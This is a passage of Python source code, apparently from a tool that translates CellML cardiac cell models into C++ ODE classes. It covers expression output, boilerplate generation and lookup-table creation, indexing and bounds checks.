self.scan_for_lookup_tables()
if not doc.lookup_tables:
# No tables found
self.use_lookup_tables = False
# Extra configuration hook
self.final_configuration_hook()
# Open the output file(s)
if output_filename is None:
output_filename = self.output_file_name(model_filename)
if self.USES_SUBSIDIARY_FILE:
output_filename, self.subsidiary_filename = self.subsidiary_file_name(output_filename)
self.output_filename = output_filename
self.out = open_output_stream(output_filename)
if self.USES_SUBSIDIARY_FILE:
self.out2 = open_output_stream(self.subsidiary_filename)
# Translate
if continuation:
continuation()
else:
self.output_top_boilerplate()
self.output_mathematics()
self.output_bottom_boilerplate()
close_output_stream(self.out)
if self.USES_SUBSIDIARY_FILE:
close_output_stream(self.out2)
return
def final_configuration_hook(self):
"""A hook for subclasses to do some final configuration."""
return
def output_file_name(self, model_filename):
"""Generate a name for our output file, based on the input file."""
return os.path.splitext(model_filename)[0] + '.cpp'
def subsidiary_file_name(self, output_filename):
"""Generate a name for the subsidiary output file, based on the main one.
Returns a pair (main_output_file_name, subsidiary_file_name). This is in
case the user specifies (e.g.) a .hpp file as the main output - we consider
the main output to be the .cpp file.
"""
base, ext = os.path.splitext(output_filename)
ext = ext[1:] # Remove the '.'
try:
new_ext = self.FILE_EXTENSIONS[ext]
swap = False
except KeyError:
swap = True
for key, val in self.FILE_EXTENSIONS.iteritems():
if val == ext:
new_ext = key
break
else:
# Turn off usage of subsidiary file
self.USES_SUBSIDIARY_FILE = False
return output_filename, None
subsidiary_filename = base + '.' + new_ext
if swap:
output_filename, subsidiary_filename = subsidiary_filename, output_filename
return output_filename, subsidiary_filename
def send_main_output_to_subsidiary(self, to_subsidiary=True):
"""Set subsequent main-file writes to go to the subsidiary file instead.
Supplying a False argument reverts this setting.
Has no effect if not using a subsidiary file.
"""
self._main_output_to_subsidiary = to_subsidiary
def writeln(self, *args, **kwargs):
"""Write a line to our output file.
Takes any number of strings as input, and writes them out to file.
Unless the keyword argument indent is given as False, then the
output will be indented to the level set by self.set_indent().
Setting indent_level will override this value.
Setting indent_offset will adjust the current level temporarily.
If nl is set to False then a newline character will not be
appended to the output.
If subsidiary=True, then the line will be written to the subsidiary
output file instead of the main one. An error will be raised if
there is no subsidiary output file.
"""
if kwargs.get('subsidiary', False) or self._main_output_to_subsidiary:
if not self.USES_SUBSIDIARY_FILE:
self.error(['Tried to write to non-existent subsidiary file'])
else:
target = self.out2
else:
target = self.out
indent = kwargs.get('indent', True)
nl = kwargs.get('nl', True)
if indent:
level = kwargs.get('indent_level', self.indent_level)
level += kwargs.get('indent_offset', 0)
target.write(self.indent_char * self.indent_factor * level)
target.write(''.join(map(str, args)))
if nl:
target.write('\n')
def write(self, *args):
"""Write to our output file.
This variant does not indent the output, or add a newline.
"""
self.writeln(indent=False, nl=False, *args)
def capture_output(self):
"""Make subsequent output operations write to a string buffer."""
self._original_out = self.out
self.out = StringIO()
def get_captured_output(self):
"""Stop capturing output, and return what was captured as a string."""
output = self.out.getvalue()
self.out = self._original_out
return output
def output_comment(self, *args, **kwargs):
"""Output a (multi-line) string as a comment."""
start = kwargs.get('start', self.COMMENT_START)
if kwargs.get('pad', False):
start = ' ' + start
comment = ''.join(map(str, args))
lines = comment.split('\n')
for line in lines:
self.writeln(start, line, **kwargs)
def output_doxygen(self, *args, **kwargs):
"""Output a (multi-line) string as a Doxygen comment."""
kwargs['start'] = self.DOXYGEN_COMMENT_START
self.output_comment(*args, **kwargs)
def set_indent(self, level=None, offset=None):
"""Set the indentation level for subsequent writes.
If offset is given, adjust the level by that amount, otherwise
set it to an absolute value.
"""
if offset is not None:
self.indent_level += offset
else:
self.indent_level = level
def code_name(self, var, ode=False, prefix=None):
"""
Return the full name of var in a form suitable for inclusion in a
source file.
If ode is True then return the name of the derivative of var
instead. We go directly to the source variable in this case,
rather than including intermediate assignment statements as is
done for connections.
"""
if prefix is None:
prefix = ['var_', 'd_dt_'][ode]
if ode:
var = var.get_source_variable(recurse=True)
name = prefix + var.fullname(cellml=True)
return name
def varobj(self, varname):
"""Return the variable object that has code_name varname."""
return cellml_variable.get_variable_object(self.model, varname)
def var_display_name(self, var):
"""Return a display name for the given variable.
If it has an oxmeta name, uses that. Otherwise uses the cmeta:id if present, or the name
attribute if not. If there is an interface component, strip the name of it out of the
display name.
"""
# TODO: support other ontologies too?
if var.oxmeta_name:
name = var.oxmeta_name
elif hasattr(var, u'id') and var.id:
name = var.id
else:
name = var.name
iface = getattr(self.model, 'interface_component_name', '#N/A#')
if name.startswith(iface):
name = name[len(iface)+2:]
return name
@property
def include_guard(self):
"""
Get the include guard (for C/C++ output) for this cell model,
based on the class name.
"""
return self.class_name.upper() + '_HPP_'
def output_top_boilerplate(self):
"""Output top boilerplate."""
self.writeln('#ifndef _', self.include_guard, '_')
self.writeln('#define _', self.include_guard, '_\n')
self.output_comment('Model: ', self.model.name)
self.output_comment(version_comment(self.add_timestamp))
self.writeln()
self.writeln('#include <cmath>')
self.writeln('#include "AbstractOdeSystem.hpp"')
self.writeln('#include "Exception.hpp"')
self.writeln('#include "AbstractStimulusFunction.hpp"\n')
self.writeln('class ', self.class_name, ' : public AbstractOdeSystem')
self.writeln('{')
self.writeln('private:')
self.writeln('AbstractStimulusFunction *mpStimulus;\n',
indent_offset=1)
self.writeln('public:')
self.set_indent(1)
self.writeln('const static unsigned _NB_OF_STATE_VARIABLES_ = ',
str(len(self.state_vars)), ';\n')
self.writeln('//', ('-'*66))
self.writeln('// Methods')
self.writeln('//', ('-'*66), '\n')
# Constructor
self.writeln('', self.class_name,
'(AbstractStimulusFunction *stim)')
self.writeln(' : AbstractOdeSystem(_NB_OF_STATE_VARIABLES_, ',
self.v_index, ')')
self.open_block()
self.writeln('mpStimulus = stim;\n')
for var in self.state_vars:
self.writeln('mVariableNames.push_back("', var.name, '");')
self.writeln('mVariableUnits.push_back("', var.units, '");')
init_val = getattr(var, u'initial_value', None)
if init_val is None:
init_comm = ' // Value not given in model'
# Don't want compiler error, but shouldn't be a real number
init_val = self.NOT_A_NUMBER
else:
init_comm = ''
self.writeln('mInitialConditions.push_back(', init_val, ');',
init_comm, '\n')
if self.use_lookup_tables: self.output_lut_generation()
self.close_block()
# Destructor
self.writeln('~', self.class_name, '(void)')
self.open_block()
if self.use_lookup_tables: self.output_lut_deletion()
self.close_block()
# Lookup table declarations & methods
if self.use_lookup_tables:
self.output_lut_declarations()
self.output_lut_methods()
# Evaluation function
self.writeln('void EvaluateYDerivatives (')
self.writeln(' double ', self.code_name(self.free_vars[0]), ',')
self.writeln(' const std::vector<double> &rY,')
self.writeln(' std::vector<double> &rDY)')
self.open_block()
self.writeln('// Inputs:')
self.writeln('// Time units: ', self.free_vars[0].units)
for i, var in enumerate(self.state_vars):
self.writeln('double ', self.code_name(var),
' = rY[', str(i), '];')
self.writeln('// Units: ', var.units, '; Initial value: ',
getattr(var, u'initial_value', 'Unknown'))
self.writeln()
if self.use_lookup_tables:
self.output_table_index_generation()
return
def output_mathematics(self):
"""Output the mathematics in this model."""
self.writeln(self.COMMENT_START, 'Mathematics')
for expr in self.model.get_assignments():
# Check this expression is actually used; don't output if not
var = None
if isinstance(expr, mathml_apply) and expr.is_assignment():
var = expr.assigned_variable()
elif isinstance(expr, cellml_variable):
var = expr
if not (var and var.get_usage_count() == 0):
self.output_assignment(expr)
return
def output_bottom_boilerplate(self):
"""Output bottom boilerplate"""
self.writeln('\n')
for i, var in enumerate(self.state_vars):
self.writeln('rDY[', str(i), '] = ', self.code_name(var, True),
';')
self.close_block()
self.set_indent(offset=-1)
self.writeln('};\n')
self.writeln('#endif')
return
def output_assignment(self, expr):
"""Output an assignment expression."""
if isinstance(expr, cellml_variable):
# This may be the assignment of a mapped variable, or a constant
t = expr.get_type()
if t == VarTypes.Mapped:
self.writeln(self.TYPE_CONST_DOUBLE, self.code_name(expr),
self.EQ_ASSIGN,
self.code_name(expr.get_source_variable()),
self.STMT_END, nl=False)
self.output_comment(expr.units, indent=False, pad=True)
elif t == VarTypes.Constant:
self.writeln(self.TYPE_CONST_DOUBLE, self.code_name(expr),
self.EQ_ASSIGN, nl=False)
self.output_number(expr.initial_value)
self.writeln(self.STMT_END, indent=False, nl=False)
self.output_comment(expr.units, indent=False, pad=True)
else:
# This is a mathematical expression
self.writeln(self.TYPE_CONST_DOUBLE, nl=False)
opers = expr.operands()
self.output_lhs(opers.next())
self.write(self.EQ_ASSIGN)
self.output_expr(opers.next(), False)
self.writeln(self.STMT_END, indent=False, nl=False)
#1365: add a comment with the LHS units
self.output_comment(expr._get_element_units(expr.eq.lhs, return_set=False).description(),
indent=False, pad=True)
def output_lhs(self, expr):
"""Output the left hand side of an assignment expression."""
if expr.localName == 'ci':
self.output_variable(expr)
elif expr.operator().localName == 'diff':
self.write(self.code_name(expr.operator().dependent_variable, ode=True))
def output_variable(self, ci_elt, ode=False):
"""Output a ci element, i.e. a variable lookup."""
self.write(self.code_name(ci_elt.variable, ode=ode))
def output_expr(self, expr, paren):
"""Output the expression expr.
If paren is True then the context has requested parentheses around the
output; if expr requires them then they will be added.
"""
if self.use_lookup_tables and self.is_lookup_table(expr):
self.output_table_lookup(expr, paren)
elif isinstance(expr, mathml_apply):
self.output_apply(expr, paren)
elif isinstance(expr, mathml_piecewise):
self.output_piecewise(expr, paren)
elif isinstance(expr, mathml_ci):
self.output_variable(expr)
elif expr.localName == u'cn':
self.output_number(expr)
elif expr.localName == u'degree':
# <degree> is just a wrapper around an expression
self.output_expr(child_i(expr, 1), paren)
elif expr.localName == u'logbase':
# <logbase> is just a wrapper around an expression
self.output_expr(child_i(expr, 1), paren)
elif expr.localName == u'true':
self.write(self.TRUE)
elif expr.localName == u'false':
self.write(self.FALSE)
elif expr.localName == u'pi':
self.write(self.PI)
elif expr.localName == u'exponentiale':
self.write(self.E)
else:
self.error(["Unsupported expression element " + expr.localName],
xml=expr)
def output_number(self, expr):
"""Output the plain number expr.
We make all constants parse as doubles to avoid problems with
integer division or numbers too large for the int type.
Negative numbers will be prefixed by a space to avoid unwanted
decrement operations.
"""
n = self.eval_number(expr)
num = "%.17g" % n
if num[0] == '-':
num = ' ' + num
if '.' not in num and 'e' not in num:
num = num + '.0'
self.write(num)
def eval_number(self, expr):
"""Evaluate a number.
If a (unicode) string, convert to float.
If a cn element, call its evaluate method.
"""
if isinstance(expr, mathml_cn):
return expr.evaluate()
else:
return float(unicode(expr))
# Map from operator element names to C++ function names,
# where the translation is straightforward.
function_map = {'power': 'pow', 'abs': 'fabs', 'ln': 'log', 'exp': 'exp',
'floor': 'floor', 'ceiling': 'ceil',
'factorial': 'factorial', # Needs external definition
'not': '!', 'rem': 'fmod',
'sin': 'sin', 'cos': 'cos', 'tan': 'tan',
'sec': '1/cos', 'csc': '1/sin', 'cot': '1/tan',
'sinh': 'sinh', 'cosh': 'cosh', 'tanh': 'tanh',
'sech': '1/cosh', 'csch': '1/sinh', 'coth': '1/tanh',
'arcsin': 'asin', 'arccos': 'acos', 'arctan': 'atan',
'arcsinh': 'asinh', 'arccosh': 'acosh', 'arctanh': 'atanh'}
# Inverse reciprocal trig functions; these are represented by
# key(x) = function_map[val](1/x)
recip_trig = {'arcsec': 'arccos', 'arccsc': 'arcsin', 'arccot': 'arctan',
'arcsech': 'arccosh', 'arccsch': 'arcsinh', 'arccoth': 'arctanh'}
# Operators
nary_ops = {'plus': '+', 'times': '*',
'and': '&&', 'or': '||'}
binary_ops = {'divide': '/',
'xor': '!=', 'eq': '==', 'neq': '!=',
'geq': '>=','leq': '<=','gt': '>','lt': '<'}
def output_apply(self, expr, paren):
"""Output an <apply> expression.
paren is True if the context has requested parentheses.
"""
op = expr.operator()
if op.localName in self.function_map:
self.output_function(self.function_map[op.localName],
expr.operands(), paren)
elif op.localName in self.recip_trig:
self.output_function(self.function_map[self.recip_trig[op.localName]],
expr.operands(), paren, reciprocal=True)
elif op.localName == u'root':
self.output_root(expr, paren)
elif op.localName == u'log':
self.output_log(expr, paren)
elif op.localName in self.nary_ops:
self.output_nary_operator(self.nary_ops[op.localName],
expr.operands(), paren)
elif op.localName in self.binary_ops:
self.output_binary_operator(self.binary_ops[op.localName],
expr.operands(), paren, expr)
elif op.localName == u'minus':
self.output_minus(expr, paren)
elif op.localName == u'diff':
# ODE occurring on the RHS
self.write(self.code_name(op.dependent_variable, ode=True))
else:
# Unrecognised operator
self.error(["Unsupported operator element " + str(op.localName)], xml=expr)
def output_function(self, func_name, args, paren, reciprocal=False):
"""Output a function call with name func_name and arguments args.
Parentheses are not required so paren is ignored.
If reciprocal is True then pass the reciprocal of each arg to
func_name.
"""
self.write(func_name + '(')
comma = False
for arg in args:
if comma: self.write(', ')
else: comma = True
if reciprocal:
self.write('1/')
self.output_expr(arg, True)
else:
self.output_expr(arg, False)
self.write(')')
def output_nary_operator(self, operator, operands, paren):
"""Output an n-ary operator (using infix notation).
If paren is True, enclose the output in parentheses.
"""
# TODO: Optimise to use expm1(x) for computing exp(x)-1
self.open_paren(paren)
op = False
for operand in operands:
if op: self.write(' ' + operator + ' ')
else: op = True
self.output_expr(operand, True)
self.close_paren(paren)
def output_unary_operator(self, operator, operand, paren):
"""Output a unary operator (using prefix notation)."""
self.open_paren(paren)
self.write(operator)
self.output_expr(operand, True)
self.close_paren(paren)
def output_binary_operator(self, operator, operands, paren, expr):
"""Output a binary operator.
As output_nary_operator, but checks that len(list(operands)) == 2.
"""
operands = list(operands)
if len(operands) != 2:
self.error(["Binary operator" + operator +
"does not have 2 operands."], xml=expr)
self.output_nary_operator(operator, operands, paren)
special_roots = {2: 'sqrt', 3: 'cbrt'}
def output_root(self, expr, paren):
"""Output a root taken to some degree.
If a degree qualifier element is not provided, uses default 2.
"""
if hasattr(expr, u'degree'):
# A degree is given. Compute x^(1/b)
# TODO: Optimise for when b==2 (sqrt) or b==3 (cbrt)
# Try to evaluate expr.degree, and if the result is a key
# of self.special_roots, use the value as the function to call.
self.write('pow(')
self.output_expr(expr.operands().next(), False)
self.write(', 1/')
self.output_expr(expr.degree, True)
self.write(')')
else:
# Compute square root
self.output_function('sqrt', expr.operands(), paren)
def output_log(self, expr, paren):
"""Output a logarithm to the given base, which defaults to base 10."""
if hasattr(expr, u'logbase'):
# A base is provided. Use the identity log_b(x) = log(x)/log(b)
# TODO: Optimise for log2(x)
self.open_paren(paren)
self.output_function('log', expr.operands(), paren)
self.write('/log(')
self.output_expr(expr.logbase, False)
self.write(')')
self.close_paren(paren)
else:
# Use base 10
self.output_function('log10', expr.operands(), paren)
def output_minus(self, expr, paren):
"""Output either a unary or binary minus.
Which is chosen depends on the number of operands.
"""
operands = list(expr.operands())
if len(operands) == 1:
self.output_unary_operator('-', operands[0], paren)
else:
self.output_binary_operator('-', operands, paren, expr)
def output_piecewise(self, expr, paren):
"""Output the piecewise expression expr.
We use a cascading ternary if expression for simplicity.
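For example, a two-piece expression generates code of the form
``c1 ? v1 : c2 ? v2 : otherwise`` (or NAN when no otherwise case is
given), parenthesised when the context requires it.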
"""
self.open_paren(paren)
for piece in getattr(expr, u'piece', []):
self.output_expr(child_i(piece, 2), True) # Condition
self.write(' ? ')
self.output_expr(child_i(piece, 1), True) # Result
self.write(' : ')
if hasattr(expr, u'otherwise'):
self.output_expr(child_i(expr.otherwise, 1), True) # Default case
else:
self.write(self.NOT_A_NUMBER)
self.close_paren(paren)
def open_paren(self, paren):
if paren: self.write('(')
def close_paren(self, paren):
if paren: self.write(')')
def open_block(self, **kwargs):
"""Open a new code block and increase indent."""
self.writeln('{', **kwargs)
self.set_indent(offset=1)
def close_block(self, blank_line=True, **kwargs):
"""Close a code block and decrease indent."""
self.set_indent(offset=-1)
self.writeln('}', **kwargs)
if blank_line:
self.writeln(**kwargs)
return
##############################
# Dependency related methods #
##############################
# These methods allow us to calculate which equations must be
# output in order to compute a given set of quantities.
def calculate_extended_dependencies(self, nodes, prune=[], prune_deps=[]):
"""Method moved to cellml_model."""
return self.model.calculate_extended_dependencies(nodes, prune, prune_deps)
def output_equations(self, nodeset):
"""Output the mathematics described by nodeset.
nodeset represents a subset of the assignments in the model.
Output assignments in the order given by a topological sort,
but only include those in nodeset.
Since a set of assignments is given, this method does not
check whether variables are used - it is assumed that only
assignments that are actually wanted are given in nodeset.
"""
for expr in (e for e in self.model.get_assignments() if e in nodeset):
self.output_assignment(expr)
return
def _vars_in(self, expr):
"""Return a set of variable objects used in the given expression.
Will include state variables. If the expression includes a derivative, the defining equation
for that derivative will be included in the set. Also if an expression is being
replaced by a lookup table, this will only include the table key variable.
"""
res = set()
if self.use_lookup_tables and isinstance(expr, mathml) and self.is_lookup_table(expr):
key_var = self.varobj(expr.getAttributeNS(NSS['lut'], u'var'))
key_var = key_var.get_source_variable(recurse=True)
res.add(key_var)
elif isinstance(expr, mathml_ci):
varobj = getattr(expr, '_cml_variable', None)
if not varobj:
varname = unicode(expr)
varobj = self.varobj(varname.strip())
if varobj:
res.add(varobj)
elif isinstance(expr, mathml_apply) and expr.operator().localName == u'diff':
dep_varname = unicode(expr.ci)
varobj = self.varobj(dep_varname.strip())
res.add(varobj.get_ode_dependency(self.free_vars[0]))
elif hasattr(expr, 'xml_children'):
for child in expr.xml_children:
res.update(self._vars_in(child))
return res
########################
# Lookup table methods #
########################
# Lookup tables should be done in a cache- and memory-
# efficient manner.
#
# Cache: Have one block of memory allocated for all tables with a
# given index variable, such that entries are found at i*N+j,
# where N is the no. of tables in the block, i is the index into a
# table, and j is the table to read. Change how lookups are done,
# such that the lookup method is called once and returns a pointer
# to the (i*N)'th entry. Places where we now call the method then
# index this pointer by j.
# The 'one block' part is done by default.
# The better lookup method is activated by --row-lookup-method.
#
# Memory: Extract the lookup tables into a separate class (in the
# same .cpp file though). This can then be made a singleton class
# in a multi-cellular context.
# Chaste code generation has the option to do this, enabled by
# default. Use --no-separate-lut-class to disable.
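#
# For example (illustrative numbers only): with N=3 tables sharing an
# index variable, row i of the block holds entries i*3+0, i*3+1 and
# i*3+2, and a row lookup returns a pointer to entry i*3 which callers
# then index by j.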
def scan_for_lookup_tables(self):
"""Search for lookup tables used in this document.
Store a list of suitable expressions on the document root.
Generate a dictionary mapping tables to their index variables.
"""
doc = self.doc
# Get list of suitable expressions
doc.lookup_tables = doc.xml_xpath(u"//*[@lut:possible='yes']")
doc.lookup_tables.sort(cmp=element_path_cmp)
# Map table keys (min, max, step, var) to an index variable
doc.lookup_table_indexes = {}
# Count the no. of lookup tables with each index variable
doc.lookup_tables_num_per_index = {}
if not doc.lookup_tables:
# If no suitable expressions, we're done
return
# Search for table index variables already assigned
table_indexes = [int(getattr(expr, u'table_index', -1))
for expr in doc.lookup_tables]
tidx = max(table_indexes) + 1
# Search for table names already assigned
table_numbers = {}
for expr in doc.lookup_tables:
if hasattr(expr, u'table_name'):
idx = expr.table_index
table_numbers[idx] = max(table_numbers.get(idx, 0), 1 + int(expr.table_name))
# Now assign new names, and construct mapping from tables to index variables
for expr in doc.lookup_tables:
# Get a suitable table index variable
comp = expr.get_component()
var = comp.get_variable_by_name(expr.var)
var = var.get_source_variable(recurse=True)
key = (expr.min, expr.max, expr.step, var)
if not key in doc.lookup_table_indexes:
var._cml_modifiable = True # Table index variables shouldn't be const, in case we constrain to table bounds
if hasattr(expr, u'table_index'):
doc.lookup_table_indexes[key] = expr.table_index
else:
doc.lookup_table_indexes[key] = unicode(tidx)
tidx += 1
expr.xml_set_attribute((u'lut:table_index', NSS['lut']),
doc.lookup_table_indexes[key])
# Get a table name, unique over all tables with this index variable
if not hasattr(expr, u'table_name'):
tnum = table_numbers.get(doc.lookup_table_indexes[key], 0)
expr.xml_set_attribute((u'lut:table_name', NSS['lut']), unicode(tnum))
table_numbers[doc.lookup_table_indexes[key]] = tnum + 1
# Re-number table indices so they are contiguous starting from 0.
table_index_map = {}
table_name_map = {}
tidx = 0
for key in sorted(doc.lookup_table_indexes.keys()):
idx = unicode(tidx)
table_index_map[doc.lookup_table_indexes[key]] = idx
table_name_map[idx] = {}
doc.lookup_table_indexes[key] = idx
doc.lookup_tables_num_per_index[idx] = 0
tidx += 1
# Make sure each lookup table is only listed once in doc.lookup_tables,
# so we don't get 2 tables for the same expression!
# Also re-number table names so they are contiguous starting from 0 for each table index.
candidates = doc.lookup_tables[:]
doc.lookup_tables = []
listed = set()
for expr in candidates:
tid = (expr.table_index, expr.table_name)
if not tid in listed:
listed.add(tid)
doc.lookup_tables.append(expr)
# Renumber
expr.table_index = table_index_map[expr.table_index]
table_name_map[expr.table_index][expr.table_name] = unicode(doc.lookup_tables_num_per_index[expr.table_index])
expr.table_name = table_name_map[expr.table_index][expr.table_name]
# Increment count for this index variable
doc.lookup_tables_num_per_index[expr.table_index] += 1
else:
# Just renumber to match the new id for this expression
expr.table_index = table_index_map[expr.table_index]
expr.table_name = table_name_map[expr.table_index][expr.table_name]
return
def lut_access_code(self, table_index, table_name, i):
"""Get the code for accessing the i'th element of the given table.
"""
return '_lookup_table_%s[%s][%s]' % (table_index, i, table_name)
def lut_parameters(self, key):
"""Get the bounds and step size for a particular table.
key should be a key into self.doc.lookup_table_indexes.
Returns (min, max, step, step_inverse) suitable for putting in generated code.
"""
return list(key[0:3]) + [unicode(1 / float(key[2]))]
def lut_size_calculation(self, min, max, step):
"""Return the equivalent of '1 + (unsigned)((max-min)/step+0.5)'."""
return '1 + (unsigned)((%s-%s)/%s+0.5)' % (max, min, step)
def output_lut_generation(self, only_index=None):
"""Output code to generate lookup tables.
There should be a list of suitable expressions available as self.doc.lookup_tables,
to save having to search the whole model.
If only_index is given, only generate tables using the given table index key.
"""
# Don't use table lookups to generate the tables!
self.use_lookup_tables = False
# Allocate memory for tables
for key, idx in self.doc.lookup_table_indexes.iteritems():
if only_index is None or only_index == idx:
min, max, step, _ = self.lut_parameters(key)
self.writeln(self.TYPE_CONST_UNSIGNED, '_table_size_', idx, self.EQ_ASSIGN,
self.lut_size_calculation(min, max, step), self.STMT_END)
self.writeln('_lookup_table_', idx, self.EQ_ASSIGN, 'new double[_table_size_', idx,
'][', self.doc.lookup_tables_num_per_index[idx], ']', self.STMT_END)
# Generate each table in a separate loop
for expr in self.doc.lookup_tables:
var = expr.component.get_variable_by_name(expr.var)
key = (expr.min, expr.max, expr.step, var.get_source_variable(recurse=True))
idx = self.doc.lookup_table_indexes[key]
if only_index is not None and only_index != idx:
continue
min, max, step, _ = self.lut_parameters(key)
j = expr.table_name
self.writeln('for (unsigned i=0 ; i<_table_size_', idx, '; i++)')
self.open_block()
self.writeln(self.TYPE_CONST_DOUBLE, self.code_name(var), self.EQ_ASSIGN, min,
' + i*', step, self.STMT_END)
self.writeln(self.lut_access_code(idx, j, 'i'), self.EQ_ASSIGN, nl=False)
self.output_expr(expr, False)
self.writeln(self.STMT_END, indent=False)
self.close_block()
self.use_lookup_tables = True
def output_lut_deletion(self, only_index=None):
"""Output code to delete memory allocated for lookup tables."""
for idx in self.doc.lookup_table_indexes.itervalues():
if only_index is None or only_index == idx:
self.writeln('if (_lookup_table_', idx, ')')
self.open_block()
self.writeln('delete[] _lookup_table_', idx, self.STMT_END)
self.writeln('_lookup_table_', idx, self.EQ_ASSIGN, 'NULL', self.STMT_END)
self.close_block(blank_line=False)
def output_lut_declarations(self):
"""Output declarations for the lookup tables."""
self.output_comment('Lookup tables')
# Allocate memory, per index variable for cache efficiency
for idx in self.doc.lookup_table_indexes.itervalues():
num_tables = unicode(self.doc.lookup_tables_num_per_index[idx])
self.writeln(self.TYPE_DOUBLE, '(*_lookup_table_', idx, ')[', num_tables, ']', self.STMT_END)
self.writeln()
def output_lut_index_declarations(self, idx):
"""Output declarations the variables used to index this table."""
self.writeln('unsigned _table_index_', idx, self.STMT_END)
factor = self.lut_factor(idx, include_type=True)
if factor:
self.writeln(factor, self.STMT_END)
if self.row_lookup_method:
self.writeln('double* _lt_', idx, '_row', self.STMT_END)
def output_lut_indices(self):
"""Output declarations for the lookup table indices."""
self.output_comment('Lookup table indices')
for idx in self.doc.lookup_table_indexes.itervalues():
self.output_lut_index_declarations(idx)
self.writeln()
def output_lut_methods(self):
"""Output the methods which look up values from lookup tables."""
if self.row_lookup_method:
self.output_lut_row_lookup_methods()
return
self.output_comment('Methods to look up values from lookup tables')
self.output_comment('using ', self.config.options.lookup_type)
for expr in self.doc.lookup_tables:
j = expr.table_name
idx = expr.table_index
self.writeln('inline double _lookup_', j, '(unsigned i',
self.lut_factor('', include_type=True, include_comma=True), ')')
self.open_block()
self.output_single_lookup(idx, j, 'return ')
self.close_block()
self.writeln()
return
def output_single_lookup(self, tidx, tname, result):
"""Write the lookup calculation for a single entry.
Used by output_lut_row_lookup_methods and output_lut_methods.
"""
self.writeln(self.TYPE_CONST_DOUBLE, 'y1', self.EQ_ASSIGN,
self.lut_access_code(tidx, tname, 'i'), self.STMT_END)
if self.config.options.lookup_type == 'linear-interpolation':
self.writeln(self.TYPE_CONST_DOUBLE, 'y2', self.EQ_ASSIGN,
self.lut_access_code(tidx, tname, 'i+1'), self.STMT_END)
self.writeln(result, 'y1 + (y2-y1)*', self.lut_factor(''), self.STMT_END)
else:
self.writeln(result, 'y1', self.STMT_END)
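# Illustrative generated body (table index 0 and column 3 assumed; when called
# from output_lut_methods the factor argument is named '_factor_'):
#   const double y1 = _lookup_table_0[i][3];
#   const double y2 = _lookup_table_0[i+1][3];
#   return y1 + (y2-y1)*_factor_;
# Under 'nearest-neighbour' lookup only y1 is read and returned.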
def output_lut_row_lookup_methods(self):
"""Write methods that return a whole row of a lookup table.
Note: assumes that table names are numbered sequentially from 0.
"""
self.output_comment('Row lookup methods')
self.output_comment('using ', self.config.options.lookup_type)
for key, idx in self.doc.lookup_table_indexes.iteritems():
num_tables = unicode(self.doc.lookup_tables_num_per_index[idx])
self.writeln('double* _lookup_', idx, '_row(unsigned i',
self.lut_factor('', include_type=True, include_comma=True), ')')
self.open_block()
self.writeln('for (unsigned j=0; j<', num_tables, '; j++)')
self.open_block()
self.output_single_lookup(idx, 'j', '_lookup_table_%s_row[j] = ' % idx)
self.close_block(False)
self.writeln('return _lookup_table_', idx, '_row;')
self.close_block()
self.writeln()
return
def output_lut_row_lookup_memory(self):
"""Output declarations for the memory used by the row lookup methods."""
self.output_comment('Row lookup methods memory')
for key, idx in self.doc.lookup_table_indexes.iteritems():
min, max, step, var = key
num_tables = unicode(self.doc.lookup_tables_num_per_index[idx])
self.writeln('double _lookup_table_', idx, '_row[', num_tables, '];')
self.writeln()
return
def is_lookup_table(self, expr):
"""Return True iff expr can be replaced by a lookup table.
Uses annotations from a previous analysis."""
return expr.getAttributeNS(NSS['lut'], u'possible', '') == u'yes'
def contained_table_indices(self, node):
"""Return all lookup tables used directly in computing this node.
If this is an expression node, checks all its children for table
lookups, and returns the set of table indices used.
"""
result = set()
if isinstance(node, amara.bindery.element_base):
if self.is_lookup_table(node):
result.add(node.table_index)
else:
for child in node.xml_children:
result.update(self.contained_table_indices(child))
return result
def lut_factor(self, idx, include_comma=False, include_type=False):
"""Return code for any extra factor needed to do a table lookup.
Will return the empty string unless linear interpolation is being used.
"""
if self.config.options.lookup_type == 'linear-interpolation':
factor = '_factor_' + str(idx)
if include_type: factor = self.TYPE_DOUBLE + factor
if include_comma: factor = ', ' + factor
else:
factor = ''
return factor
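# e.g. under linear interpolation lut_factor(2) returns '_factor_2', and
# lut_factor(2, include_comma=True, include_type=True) returns
# ', double _factor_2' (type prefix applied before the comma); under
# nearest-neighbour lookup every call returns the empty string.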
def output_table_lookup(self, expr, paren):
"""Output code to look up expr in the appropriate table."""
i = expr.table_index
if self.row_lookup_method:
self.write('_lt_', i, '_row[', expr.table_name, ']')
else:
self.write(self.lookup_method_prefix, '_lookup_', expr.table_name,
'(_table_index_', i, self.lut_factor(i, include_comma=True), ')')
return
def output_table_index_generation(self, time_name, nodeset=set()):
"""Output code to calculate indexes into any lookup tables.
If time_name is given and table bounds are being checked, the time value will be included in the
error message. Note that we need to pass it in, since in some contexts the free variable is not
defined.
If nodeset is given, then filter the table indices calculated so
that only those needed to compute the nodes in nodeset are defined.
A nodeset is required if any table indices are computed variables rather than state variables.
In this case, we use the equations within nodeset to calculate the values of the indices, and
return a set containing just those nodes used, so we can avoid recalculating them later.
"""
tables_to_index = set()
nodes_used = set()
for node in nodeset:
tables_to_index.update(self.contained_table_indices(node))
if tables_to_index or not nodeset:
self.output_comment('Lookup table indexing')
for key, idx in self.doc.lookup_table_indexes.iteritems():
if not nodeset or idx in tables_to_index:
var = key[-1]
if var.get_type() is VarTypes.Computed:
if not nodeset:
raise TranslationError('Unable to generate lookup table indexed on', var, 'as it is a computed variable')
var_nodes = self.calculate_extended_dependencies([var]) & nodeset
self.output_equations(var_nodes)
nodes_used.update(var_nodes)
self.output_table_index_checking(key, idx)
if self.config.options.check_lt_bounds:
self.writeln('#define COVERAGE_IGNORE', indent=False)
self.writeln('if (_oob_', idx, ')')
if time_name is None:
dump_state_args = 'rY'
else:
dump_state_args = 'rY, ' + time_name
self.writeln('EXCEPTION(DumpState("', self.var_display_name(key[-1]),
' outside lookup table range", ', dump_state_args,'));', indent_offset=1)
self.writeln('#undef COVERAGE_IGNORE', indent=False)
self.output_table_index_generation_code(key, idx)
self.writeln()
return nodes_used
def output_table_index_checking(self, key, idx):
"""Check whether a table index is out of bounds."""
if self.config.options.check_lt_bounds:
var = key[-1]
min, max, _, _ = self.lut_parameters(key)
varname = self.code_name(var)
self.writeln('bool _oob_', idx, self.EQ_ASSIGN, 'false', self.STMT_END)
self.writeln('if (', varname, '>', max, ' || ', varname, '<', min, ')')
self.open_block()
self.writeln('#define COVERAGE_IGNORE', indent=False)
if self.constrain_table_indices:
self.writeln('if (', varname, '>', max, ') ', varname, self.EQ_ASSIGN, max, self.STMT_END)
